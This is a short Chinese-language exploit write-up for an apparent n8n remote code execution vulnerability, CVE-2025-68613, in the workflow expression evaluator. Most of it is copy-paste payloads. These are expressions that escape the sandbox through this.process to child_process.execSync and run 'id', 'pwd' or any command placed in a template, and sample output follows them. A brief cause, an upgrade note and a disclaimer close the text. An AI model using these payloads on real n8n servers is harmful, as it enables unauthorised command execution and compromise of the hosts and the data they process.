
CVE-2025-68613: n8n RCE漏洞利用与文档
n8n 包含一个严重的任意代码执行漏洞,存在于其工作流表达式评估系统中。在特定条件下,经过身份验证的用户在工作流配置期间提供的表达式可能会在未充分隔离底层运行时的执行上下文中被评估。
将以下负载粘贴到表达式字段中:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

ID 命令:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}
PWD 命令:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}
自定义命令模板:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('COMMAND').toString() })() }}
对于 id 命令:
uid=1000(node) gid=1000(node) groups=1000(node)
对于 pwd 命令:
/app
表达式评估器缺少清理机制,无法阻止函数表达式访问 this.process(Node.js 进程对象),从而导致可以访问系统模块。
升级到 n8n v1.122.0 或更高版本。
免责声明:此信息仅供沙盒和教育目的使用。未经授权使用此信息利用系统是非法且不道德的。在测试或利用漏洞之前,请始终获得适当的授权。